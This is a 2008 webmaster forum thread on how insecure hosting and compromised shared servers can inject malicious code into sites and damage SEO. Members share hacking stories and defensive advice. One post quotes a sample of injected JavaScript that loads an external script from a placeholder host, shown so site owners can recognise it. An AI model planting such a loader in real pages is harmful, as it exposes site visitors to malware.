homepage Welcome to WebmasterWorld Guest from 23.22.29.137
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Pubcon Platinum Sponsor 2014
Home / Forums Index / Marketing and Biz Dev / General Search Engine Marketing Issues
Forum Library, Charter, Moderators: mademetop

General Search Engine Marketing Issues Forum

    
Can you Trust your Host with your SEO?
Are you certain that your host is not the root of your challenges?
pageoneresults




msg:3583942
 2:47 pm on Feb 25, 2008 (gmt 0)

Okay, you've done all the SEO you can to your site, that's great. Your pulling results and starting to see a nice little growth trend in your stats. Congratulations and welcome to the Internet.

What's that in my Website Code?

You wake up this morning and you find some unusual JavaScript being inserted into your pages. You haven't looked at the source in a while so this is new to you. Then you do some advanced site: searches in Google and you notice that there is a Malware/Spyware warning attached to your SERPs. What?!?!?! you say. How did that happen?

Over the past few years I've become more in tune with the technical side of things and how all of that can have a dramatic impact on your SEO campaigns. If your site is doing well for a fairly competitive set of terms in an industry that is most likely to be targeted by undermining competitors (sleeze as some refer to them), you are open to a variety of technical exploits, believe me, it happens everyday and I don't care what anyone tells me, it has a direct impact on your campaign. "There is almost nothing a competitor can do to harm your site."

So, is your Website Host to be Trusted with your SEO?

Really? If I were you, I'd be investigating your hosting environment a little more carefully. There are tools out there that will allow you to see various information about your host that will help you determine at least some of the issues you may be faced with. I surely wouldn't feel comfortable sharing an IP with someone I didn't know and, that is going to happen with many. These days, if you are serious about this stuff, your hosting environment needs to be locked down, secure and trusted. If you are sitting there on a shared IP and a small percentage of others on that IP have also been compromised, how secure or trusted is that?

How frequently does this happen? Oh, I think we'd be surprised at the numbers, they are far greater than you think at the moment. If you search WebmasterWorld for topics where members are discussing their servers being compromised, the numbers are fairly large and should be of major concern for anyone doing SEO. Here are just a few that I grabbed from a random search...

My Server has been Compromised

2008-02-25 - Sites have been hacked
[webmasterworld.com...]

2008-02-23 - Virus in my website code?
[webmasterworld.com...]

2007-12-07 - Site hacked, what can I do?
[webmasterworld.com...]

2007-09-21 - Pages on site being compromised
[webmasterworld.com...]

2007-06-15 - Malicious Javascript On My Site
[webmasterworld.com...]

2005-12-20 - Code inserted into web page
[webmasterworld.com...]

They go all the way back to the beginning of WebmasterWorld and before then. You would think that many of these holes would have been patched by now and they probably are, but users haven't upgraded their platforms and/or installed the latest security patches, etc. The list of ongoing maintenance to keep a server secure and trusted is a long one.

If you are a WebmasterWorld Supporter, there is an excellent topic right now (in The Wall) concerning a group that has just released a tool that turns Google into a vulnerability scanner, some pretty intense stuff.

Do you feel safe in your hosting environment? On a scale of 1-10, how safe do you really feel?

 

walrus




msg:3584059
 5:10 pm on Feb 25, 2008 (gmt 0)

4, i would have said 7 if i was asked before reading your post. :)
tool that turns Google into a vulnerability scanner

Yikes !

rogerd




msg:3584087
 5:56 pm on Feb 25, 2008 (gmt 0)

This really points out how important choosing a good web host is. Sometimes, it's the cheapo, "too good to be true" hosting companies that end up either injecting code or just not doing the right server patching.

Price alone isn't a guarantee of security. A couple of years ago, I had several sites on shared hosting get defaced after a server was exploited. This host was actually one of the most expensive (for shared hosting) that I used, but apparently their tech skills weren't up to snuff. After the same thing happened a couple of weeks in a row, I moved all of the sites I had hosted there.

In that case, if the hacker had just slipped in a spurious link or two instead of simply defacing the site, it might have been a while before anyone noticed.

Best way to choose a host: get recommendations from savvy webmasters with at least a year or two of experience with a host.

[edited by: rogerd at 6:24 pm (utc) on Feb. 25, 2008]

King_Fisher




msg:3584094
 6:03 pm on Feb 25, 2008 (gmt 0)

Now I am going to be unable to sleep nights!...KF

pageoneresults




msg:3584116
 6:42 pm on Feb 25, 2008 (gmt 0)

In that case, if the hacker had just slipped in a spurious link or two instead of simply defacing the site, it might have been a while before anyone noticed.

Google will notice...

How can I find out if my site has been identified as a web site that hosts or distributes malicious software and what can I do if it has?
[google.com...]

Google uses its own criteria, procedures, and tools to identify sites that host or distribute badware. In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message. If you feel your site has been mistakenly identified, or if you make changes to your site so that it no longer hosts or distributes malicious software and you secure your site so that it is no longer vulnerable to the insertion of badware, you can request that your site be reviewed.

Emphasis mine above. Here is a previous topic discussing Trusted Hosting Environments from 2006-04-23, you can skip the .gov and .edu intro, the rest applies to this topic.

THE - Trusted Hosting Environments
Are you at risk in your current hosting situation?
[webmasterworld.com...]

In the past couple of years, I've come across more than a handful of instances where there was malicious code on someone's website. A quick view of the source and some of it is rather easy to identify. Many of the examples I came across sat right at the bottom of the html somewhere, at times, right after the closing </html> element. Or, there were a few lines added to an external js file, those are the ones you really need to look for. And, if you are not familiar with JavaScript, find someone who is. Use the tools available to you for scanning, validating, etc. to make sure your house is secure.

Here is one example I found during a review of a site...

[red]<SCRIPT language=javascript>
kstatus();
function kstatus(){
self.status=" ";
setTimeout('kstatus()',0);
}
</SCRIPT>
<script language="javascript" src="http://example.com/lr.js"></script>[/red]

That little script invoked some sort of ActiveX prompt when visiting those sites that contained it. The script was within an <iframe> on some obscure ccTLD (and even .com's) and had some pretty hefty encryption attached to it. I would imagine it was rather damaging to the visitor, or it tried to be. Most of the basic browser security settings are going to catch "some of these" but, "not all of them".

Its nice to see Google being Proactive in this area. They've realized that it is a major area of concern and have gone out of their way to clearly label those sites in the SERPs that may be potential malicious software distribution points. Is your site one of them?

Now I am going to be unable to sleep nights!

I don't want to cause any sort of panic. Its just something that many "SEO's" are not going to think about. They are "assuming" that the provider they've chosen is on top of all this and has provided a trusted and secure hosting environment for you and the others. As I mentioned in my opening post, you can do all the SEO by the book and a flaw and/or, multiple flaws at the server make it moot.

walrus




msg:3588331
 8:53 pm on Feb 29, 2008 (gmt 0)

Those are great posts pageone !

JonSimmonds




msg:3595594
 12:46 pm on Mar 9, 2008 (gmt 0)

I've had problems wiht a old host, one day he went into phpmyadmin and modified his user on my forum to become a moderator (all it took was changing the usergroup id) then I caught him at it browsing my staff room threads... within 24 hours I was elsewere. (to help prevent this happening you can setup a forum password for your staff room in most popular forum software)

A friend has also had some of his sites pages modified, were links to adult sites were added in his footer.

maximillianos




msg:3595598
 1:24 pm on Mar 9, 2008 (gmt 0)

Our site was hacked in the past and our ISP was the one who actually figured it out and alerted us.

So I guess it can go both ways... Plus we have a dedicated server, which was even more impressive that they caught it. They were strictly analyzing the irregular data patterns to another country.

httpwebwitch




msg:3595714
 6:16 pm on Mar 9, 2008 (gmt 0)

The more I research XSS exploitation, the more I learn how easy vulnerabilities are to find, and how potentially destructive they can be. Not all XSS exploits are as docile or relatively harmless as the famous Samy (aka JS.SpaceHero). AJAXified applications are an order of magnitude more exposed than traditional web apps.

I've had my AdWords account suspended a couple of times when Google discovered "malware" - which embarassingly turned out to be scripts that I myself put in place for my own custom analytics. Sure it's annoying, but it's also comforting to know that G is looking out for my user's best interests.

Security is a constant, ongoing PITA.

Essex_boy




msg:3595726
 6:30 pm on Mar 9, 2008 (gmt 0)

I have had this one particular host that meant I had a raft of problems with hacked sites and malicous code inserts, I suspect it wasnt them but hey had an insecure environment in which they ran their servers.

It last for around 4 months and hasnt happened since, thing was they denied it all....

incrediBILL




msg:3595742
 6:45 pm on Mar 9, 2008 (gmt 0)

pageoneresults, nice post about the problem but you offered no SOLUTIONS except checking out web hosts which can help but isn't flawless as any host or dedicated server is vulnerable at any given point in time.

What you need to do is be proactive and use automated monitoring tools to check your website for page changes, especially the home page.

There are some free online services, paid services and software you can download that perform this function. I'd recommend just like with server alarm monitoring that you use at least 2 different page content monitoring services just in case one is unable to access your server.

If you can get in and correct the problem before Google crawls the page again your SEO is safe.

a_chameleon




msg:3595828
 10:41 pm on Mar 9, 2008 (gmt 0)

Those are great posts pageone !
I agree! A few days of research is well worth several weeks of cure :)

Dabrowski




msg:3595836
 11:00 pm on Mar 9, 2008 (gmt 0)

I'll give my hosting provider 10 out of 10.

I host my own server, I have 2, 1 in my house, 1 in my office. Both are protected by hardware firewalls.

I'd like to see anyone still some extraneous JS in my pages.

conor




msg:3595849
 11:22 pm on Mar 9, 2008 (gmt 0)

For this ( and many other ) reasons we always host ourselves. I have over the years thought about the savings we could make if we were not our own ISP/Host but in the long run it has proved to be the right decision.

Lorel




msg:3595850
 11:34 pm on Mar 9, 2008 (gmt 0)

Re shared hosting from what I understand it's not necessarily the hosts fault but more a problem with not being able to provide a dedicate IP for everyone on the Internet due to a limited number of IP numbers.

I believe my Host rates a 10 because they are always upgrading their hardware and software to keep ahead of potential problems. I have over 20 clients with each on their own dedicated IP address with no problems.

incrediBILL




msg:3595865
 12:39 am on Mar 10, 2008 (gmt 0)

I'm actually chuckling at some of the false sense of security I'm reading in some of these posts.

In a shared hosting environment, whether or not your HOST is making your site secure by upgrading isn't always as important as all of the sites on that server upgrading as well. All it takes is one WordPress or Joomla! site being hacked for the hackers to discover if they can escalate privileges and own the box.

Hopefully the hackers can just own the single hacked account, but I've seen too many servers and hosting companies completely hacked to give me any doubts one mistake is all it takes.

[edited by: incrediBILL at 12:39 am (utc) on Mar. 10, 2008]

a_chameleon




msg:3595882
 1:23 am on Mar 10, 2008 (gmt 0)

I'm actually chuckling at some of the false sense of security I'm reading in some of these posts.

At the end of the day, if I'm still up to date,
isn't "Open BSD" the only website firewall that's
{allegedly} never been hacked?

.

webdoctor




msg:3596293
 2:46 pm on Mar 10, 2008 (gmt 0)

At the end of the day, if I'm still up to date,
isn't "Open BSD" the only website firewall that's
{allegedly} never been hacked?

How often do you update?

internetheaven




msg:3597365
 12:43 pm on Mar 11, 2008 (gmt 0)

All my colleagues thought I was nuts forking out 1100 a month on three managed dedicated servers. I've never had a problem in four years except for one failed DOS attack ... but I've still had to listen to all of their problems for those four years ... ;)

jake66




msg:3598175
 6:27 am on Mar 12, 2008 (gmt 0)

No. Shortly after I complained about a support personnel from my host, I notice one of my database entries changed to a terrorist-related site. Granted, it was just the title bar.. but I was pretty steamed about it at the time.

I've never had any problems with my host other than that incident. But that situation has prompted me to lock down my server's firewall with blocking ssh & ftp ports to anyone but myself.

I'm going to go out on a limb and say he got in a bit of trouble because of my complaint.. I was dumb and trusted my host too much. I didn't change the root password after dealing with them. I will assume he wrote it down and connected once he got home and did his deed.

To me, it's no different than one of my employees going verbally crazy on a customer for complaining about something they did (after running to them into a mall or something.. how can I control what they do outside of work?). So until it happens again, I will shrug it off as a one-time, unfortunate event.. that taught me a valuable lesson.

enginetech




msg:3600020
 10:50 pm on Mar 13, 2008 (gmt 0)

Great post pageone; thank you very much.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Marketing and Biz Dev / General Search Engine Marketing Issues
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved